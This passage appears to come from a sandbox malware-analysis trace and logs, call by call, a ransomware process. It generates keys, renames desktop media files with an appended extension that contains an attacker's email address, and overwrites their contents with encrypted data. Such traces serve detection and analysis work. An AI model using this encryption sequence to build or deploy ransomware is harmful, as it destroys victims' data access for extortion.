dwFlags=0x0, lpMem=0x383d90 | out: hHeap=0x2e0000) returned 1 [0160.769] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x328bd8 | out: hHeap=0x2e0000) returned 1 [0160.769] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x328c60 | out: hHeap=0x2e0000) returned 1 [0160.769] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x70) returned 0x3a9428 [0160.769] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x100) returned 0x363948 [0160.769] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x8) returned 0x383d90 [0160.769] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x20, pbBuffer=0x363948 | out: pbBuffer=0x363948) returned 1 [0160.769] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x8, pbBuffer=0x383d90 | out: pbBuffer=0x383d90) returned 1 [0160.769] SetFileAttributesW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\qTp aPR6Wpwl.bmp", dwFileAttributes=0x80) returned 1 [0160.769] lstrlenW (lpString="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\qTp aPR6Wpwl.bmp") returned 55 [0160.769] GetProcessHeap () returned 0x2e0000 [0160.769] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0xd4) returned 0x31fae0 [0160.769] lstrcpyW (in: lpString1=0x31fae0, lpString2="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\qTp aPR6Wpwl.bmp" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\qTp aPR6Wpwl.bmp") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\qTp aPR6Wpwl.bmp" [0160.769] lstrcatW (in: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\qTp aPR6Wpwl.bmp", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\qTp aPR6Wpwl.bmp.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\qTp aPR6Wpwl.bmp.12781717671972518758.ex_parvis@aol.com.AIR" [0160.770] MoveFileExW (lpExistingFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\qTp aPR6Wpwl.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\qtp apr6wpwl.bmp"), lpNewFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\qTp aPR6Wpwl.bmp.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\qtp apr6wpwl.bmp.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1 [0160.772] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\qTp aPR6Wpwl.bmp.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\qtp apr6wpwl.bmp.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x398 [0160.772] GetProcessHeap () returned 0x2e0000 [0160.772] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x31fae0 | out: hHeap=0x2e0000) returned 1 [0160.772] GetFileSizeEx (in: hFile=0x398, lpFileSize=0x2acf98c | out: lpFileSize=0x2acf98c*=38197) returned 1 [0160.772] SetFilePointer (in: hFile=0x398, lDistanceToMove=0, lpDistanceToMoveHigh=0x2acf9a8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2acf9a8*=0) returned 0x9535 [0160.773] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2acf9c4*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x2acf9c4*=0x100) returned 1 [0160.773] GetProcessHeap () returned 0x2e0000 [0160.773] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x100) returned 0x363a50 [0160.773] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x363a50*, pdwDataLen=0x2acf9b4*=0x20, dwBufLen=0x100 | out: pbData=0x363a50*, pdwDataLen=0x2acf9b4*=0x100) returned 1 [0160.773] WriteFile (in: hFile=0x398, lpBuffer=0x363a50*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x363a50*, lpNumberOfBytesWritten=0x2acf9c8*=0x100, lpOverlapped=0x0) returned 1 [0160.774] WriteFile (in: hFile=0x398, lpBuffer=0x383d90*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383d90*, lpNumberOfBytesWritten=0x2acf9c8*=0x8, lpOverlapped=0x0) returned 1 [0160.774] WriteFile (in: hFile=0x398, lpBuffer=0x383d90*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383d90*, lpNumberOfBytesWritten=0x2acf9c8*=0x4, lpOverlapped=0x0) returned 1 [0160.774] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x9535) returned 0x3aa410 [0160.774] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x9535) returned 0x3b3950 [0160.774] SetFilePointer (in: hFile=0x398, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0160.774] ReadFile (in: hFile=0x398, lpBuffer=0x3aa410, nNumberOfBytesToRead=0x9535, lpNumberOfBytesRead=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x3aa410*, lpNumberOfBytesRead=0x2acf9c8*=0x9535, lpOverlapped=0x0) returned 1 [0160.774] SetFilePointer (in: hFile=0x398, lDistanceToMove=-38197, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0160.774] WriteFile (in: hFile=0x398, lpBuffer=0x3b3950*, nNumberOfBytesToWrite=0x9535, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x3b3950*, lpNumberOfBytesWritten=0x2acf9c8*=0x9535, lpOverlapped=0x0) returned 1 [0160.774] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3aa410 | out: hHeap=0x2e0000) returned 1 [0160.774] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3b3950 | out: hHeap=0x2e0000) returned 1 [0160.774] CloseHandle (hObject=0x398) returned 1 [0160.775] GetProcessHeap () returned 0x2e0000 [0160.775] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x363a50 | out: hHeap=0x2e0000) returned 1 [0160.775] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x363948 | out: hHeap=0x2e0000) returned 1 [0160.775] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x383d90 | out: hHeap=0x2e0000) returned 1 [0160.775] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3a9428 | out: hHeap=0x2e0000) returned 1 [0160.775] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x336e50 | out: hHeap=0x2e0000) returned 1 [0160.775] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x70) returned 0x3a9428 [0160.775] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x100) returned 0x363948 [0160.775] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x8) returned 0x383d90 [0160.775] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x20, pbBuffer=0x363948 | out: pbBuffer=0x363948) returned 1 [0160.775] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x8, pbBuffer=0x383d90 | out: pbBuffer=0x383d90) returned 1 [0160.775] SetFileAttributesW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Q9qoLmUohJf4.mp3", dwFileAttributes=0x80) returned 1 [0160.776] lstrlenW (lpString="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Q9qoLmUohJf4.mp3") returned 55 [0160.776] GetProcessHeap () returned 0x2e0000 [0160.776] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0xd4) returned 0x31fae0 [0160.776] lstrcpyW (in: lpString1=0x31fae0, lpString2="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Q9qoLmUohJf4.mp3" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Q9qoLmUohJf4.mp3") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Q9qoLmUohJf4.mp3" [0160.776] lstrcatW (in: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Q9qoLmUohJf4.mp3", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Q9qoLmUohJf4.mp3.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Q9qoLmUohJf4.mp3.12781717671972518758.ex_parvis@aol.com.AIR" [0160.776] MoveFileExW (lpExistingFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Q9qoLmUohJf4.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\q9qolmuohjf4.mp3"), lpNewFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Q9qoLmUohJf4.mp3.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\q9qolmuohjf4.mp3.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1 [0160.778] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Q9qoLmUohJf4.mp3.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\q9qolmuohjf4.mp3.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x398 [0160.778] GetProcessHeap () returned 0x2e0000 [0160.778] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x31fae0 | out: hHeap=0x2e0000) returned 1 [0160.778] GetFileSizeEx (in: hFile=0x398, lpFileSize=0x2acf98c | out: lpFileSize=0x2acf98c*=38424) returned 1 [0160.779] SetFilePointer (in: hFile=0x398, lDistanceToMove=0, lpDistanceToMoveHigh=0x2acf9a8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2acf9a8*=0) returned 0x9618 [0160.779] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2acf9c4*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x2acf9c4*=0x100) returned 1 [0160.779] GetProcessHeap () returned 0x2e0000 [0160.779] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x100) returned 0x363a50 [0160.779] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x363a50*, pdwDataLen=0x2acf9b4*=0x20, dwBufLen=0x100 | out: pbData=0x363a50*, pdwDataLen=0x2acf9b4*=0x100) returned 1 [0160.787] WriteFile (in: hFile=0x398, lpBuffer=0x363a50*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x363a50*, lpNumberOfBytesWritten=0x2acf9c8*=0x100, lpOverlapped=0x0) returned 1 [0160.788] WriteFile (in: hFile=0x398, lpBuffer=0x383d90*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383d90*, lpNumberOfBytesWritten=0x2acf9c8*=0x8, lpOverlapped=0x0) returned 1 [0160.788] WriteFile (in: hFile=0x398, lpBuffer=0x383d90*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383d90*, lpNumberOfBytesWritten=0x2acf9c8*=0x4, lpOverlapped=0x0) returned 1 [0160.788] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x9618) returned 0x3aa410 [0160.788] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x9618) returned 0x3b3a30 [0160.788] SetFilePointer (in: hFile=0x398, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0160.788] ReadFile (in: hFile=0x398, lpBuffer=0x3aa410, nNumberOfBytesToRead=0x9618, lpNumberOfBytesRead=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x3aa410*, lpNumberOfBytesRead=0x2acf9c8*=0x9618, lpOverlapped=0x0) returned 1 [0160.788] SetFilePointer (in: hFile=0x398, lDistanceToMove=-38424, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0160.788] WriteFile (in: hFile=0x398, lpBuffer=0x3b3a30*, nNumberOfBytesToWrite=0x9618, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x3b3a30*, lpNumberOfBytesWritten=0x2acf9c8*=0x9618, lpOverlapped=0x0) returned 1 [0160.789] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3aa410 | out: hHeap=0x2e0000) returned 1 [0160.789] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3b3a30 | out: hHeap=0x2e0000) returned 1 [0160.789] CloseHandle (hObject=0x398) returned 1 [0160.789] GetProcessHeap () returned 0x2e0000 [0160.789] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x363a50 | out: hHeap=0x2e0000) returned 1 [0160.789] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x363948 | out: hHeap=0x2e0000) returned 1 [0160.789] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x383d90 | out: hHeap=0x2e0000) returned 1 [0160.789] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3a9428 | out: hHeap=0x2e0000) returned 1 [0160.789] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x336dd8 | out: hHeap=0x2e0000) returned 1 [0160.789] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x70) returned 0x3a9428 [0160.789] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x100) returned 0x363948 [0160.789] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x8) returned 0x383d90 [0160.789] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x20, pbBuffer=0x363948 | out: pbBuffer=0x363948) returned 1 [0160.789] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x8, pbBuffer=0x383d90 | out: pbBuffer=0x383d90) returned 1 [0160.789] SetFileAttributesW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\LQrK2DOgzbi3.mkv", dwFileAttributes=0x80) returned 1 [0160.790] lstrlenW (lpString="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\LQrK2DOgzbi3.mkv") returned 55 [0160.790] GetProcessHeap () returned 0x2e0000 [0160.790] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0xd4) returned 0x336dd8 [0160.790] lstrcpyW (in: lpString1=0x336dd8, lpString2="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\LQrK2DOgzbi3.mkv" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\LQrK2DOgzbi3.mkv") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\LQrK2DOgzbi3.mkv" [0160.790] lstrcatW (in: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\LQrK2DOgzbi3.mkv", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\LQrK2DOgzbi3.mkv.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\LQrK2DOgzbi3.mkv.12781717671972518758.ex_parvis@aol.com.AIR" [0160.790] MoveFileExW (lpExistingFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\LQrK2DOgzbi3.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\lqrk2dogzbi3.mkv"), lpNewFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\LQrK2DOgzbi3.mkv.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\lqrk2dogzbi3.mkv.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1 [0160.793] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\LQrK2DOgzbi3.mkv.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\lqrk2dogzbi3.mkv.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x398 [0160.793] GetProcessHeap () returned 0x2e0000 [0160.793] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x336dd8 | out: hHeap=0x2e0000) returned 1 [0160.793] GetFileSizeEx (in: hFile=0x398, lpFileSize=0x2acf98c | out: lpFileSize=0x2acf98c*=18010) returned 1 [0160.793] SetFilePointer (in: hFile=0x398, lDistanceToMove=0, lpDistanceToMoveHigh=0x2acf9a8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2acf9a8*=0) returned 0x465a [0160.793] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2acf9c4*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x2acf9c4*=0x100) returned 1 [0160.793] GetProcessHeap () returned 0x2e0000 [0160.793] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x100) returned 0x363a50 [0160.793] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x363a50*, pdwDataLen=0x2acf9b4*=0x20, dwBufLen=0x100 | out: pbData=0x363a50*, pdwDataLen=0x2acf9b4*=0x100) returned 1 [0160.794] WriteFile (in: hFile=0x398, lpBuffer=0x363a50*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x363a50*, lpNumberOfBytesWritten=0x2acf9c8*=0x100, lpOverlapped=0x0) returned 1 [0160.795] WriteFile (in: hFile=0x398, lpBuffer=0x383d90*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383d90*, lpNumberOfBytesWritten=0x2acf9c8*=0x8, lpOverlapped=0x0) returned 1 [0160.795] WriteFile (in: hFile=0x398, lpBuffer=0x383d90*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383d90*, lpNumberOfBytesWritten=0x2acf9c8*=0x4, lpOverlapped=0x0) returned 1 [0160.795] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x465a) returned 0x3aa410 [0160.795] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x465a) returned 0x3aea78 [0160.795] SetFilePointer (in: hFile=0x398, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0160.795] ReadFile (in: hFile=0x398, lpBuffer=0x3aa410, nNumberOfBytesToRead=0x465a, lpNumberOfBytesRead=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x3aa410*, lpNumberOfBytesRead=0x2acf9c8*=0x465a, lpOverlapped=0x0) returned 1 [0160.796] SetFilePointer (in: hFile=0x398, lDistanceToMove=-18010, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0160.796] WriteFile (in: hFile=0x398, lpBuffer=0x3aea78*, nNumberOfBytesToWrite=0x465a, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x3aea78*, lpNumberOfBytesWritten=0x2acf9c8*=0x465a, lpOverlapped=0x0) returned 1 [0160.796] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3aa410 | out: hHeap=0x2e0000) returned 1 [0160.796] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3aea78 | out: hHeap=0x2e0000) returned 1 [0160.796] CloseHandle (hObject=0x398) returned 1 [0160.796] GetProcessHeap () returned 0x2e0000 [0160.796] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x363a50 | out: hHeap=0x2e0000) returned 1 [0160.796] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x363948 | out: hHeap=0x2e0000) returned 1 [0160.796] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x383d90 | out: hHeap=0x2e0000) returned 1 [0160.796] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3a9428 | out: hHeap=0x2e0000) returned 1 [0160.796] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x31f5f0 | out: hHeap=0x2e0000) returned 1 [0160.796] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x80) returned 0x328c60 [0160.796] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x100) returned 0x363948 [0160.796] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x8) returned 0x383d90 [0160.796] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x20, pbBuffer=0x363948 | out: pbBuffer=0x363948) returned 1 [0160.796] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x8, pbBuffer=0x383d90 | out: pbBuffer=0x383d90) returned 1 [0160.796] SetFileAttributesW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\KSXbXK_kbK_G83ifB4fv.wav", dwFileAttributes=0x80) returned 1 [0160.797] lstrlenW (lpString="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\KSXbXK_kbK_G83ifB4fv.wav") returned 63 [0160.797] GetProcessHeap () returned 0x2e0000 [0160.797] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0xe4) returned 0x3a7428 [0160.797] lstrcpyW (in: lpString1=0x3a7428, lpString2="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\KSXbXK_kbK_G83ifB4fv.wav" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\KSXbXK_kbK_G83ifB4fv.wav") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\KSXbXK_kbK_G83ifB4fv.wav" [0160.797] lstrcatW (in: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\KSXbXK_kbK_G83ifB4fv.wav", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\KSXbXK_kbK_G83ifB4fv.wav.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\KSXbXK_kbK_G83ifB4fv.wav.12781717671972518758.ex_parvis@aol.com.AIR" [0160.797] MoveFileExW (lpExistingFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\KSXbXK_kbK_G83ifB4fv.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ksxbxk_kbk_g83ifb4fv.wav"), lpNewFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\KSXbXK_kbK_G83ifB4fv.wav.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ksxbxk_kbk_g83ifb4fv.wav.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1 [0160.800] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\KSXbXK_kbK_G83ifB4fv.wav.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ksxbxk_kbk_g83ifb4fv.wav.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x398 [0160.800] GetProcessHeap () returned 0x2e0000 [0160.800] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3a7428 | out: hHeap=0x2e0000) returned 1 [0160.800] GetFileSizeEx (in: hFile=0x398, lpFileSize=0x2acf98c | out: lpFileSize=0x2acf98c*=46233) returned 1 [0160.800] SetFilePointer (in: hFile=0x398, lDistanceToMove=0, lpDistanceToMoveHigh=0x2acf9a8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2acf9a8*=0) returned 0xb499 [0160.800] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2acf9c4*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x2acf9c4*=0x100) returned 1 [0160.800] GetProcessHeap () returned 0x2e0000 [0160.800] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x100) returned 0x363a50 [0160.800] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x363a50*, pdwDataLen=0x2acf9b4*=0x20, dwBufLen=0x100 | out: pbData=0x363a50*, pdwDataLen=0x2acf9b4*=0x100) returned 1 [0160.800] WriteFile (in: hFile=0x398, lpBuffer=0x363a50*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x363a50*, lpNumberOfBytesWritten=0x2acf9c8*=0x100, lpOverlapped=0x0) returned 1 [0160.801] WriteFile (in: hFile=0x398, lpBuffer=0x383d90*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383d90*, lpNumberOfBytesWritten=0x2acf9c8*=0x8, lpOverlapped=0x0) returned 1 [0160.801] WriteFile (in: hFile=0x398, lpBuffer=0x383d90*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383d90*, lpNumberOfBytesWritten=0x2acf9c8*=0x4, lpOverlapped=0x0) returned 1 [0160.801] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0xb499) returned 0x3aa410 [0160.801] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0xb499) returned 0x3b58b8 [0160.801] SetFilePointer (in: hFile=0x398, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0160.801] ReadFile (in: hFile=0x398, lpBuffer=0x3aa410, nNumberOfBytesToRead=0xb499, lpNumberOfBytesRead=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x3aa410*, lpNumberOfBytesRead=0x2acf9c8*=0xb499, lpOverlapped=0x0) returned 1 [0160.802] SetFilePointer (in: hFile=0x398, lDistanceToMove=-46233, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0160.802] WriteFile (in: hFile=0x398, lpBuffer=0x3b58b8*, nNumberOfBytesToWrite=0xb499, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x3b58b8*, lpNumberOfBytesWritten=0x2acf9c8*=0xb499, lpOverlapped=0x0) returned 1 [0160.802] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3aa410 | out: hHeap=0x2e0000) returned 1 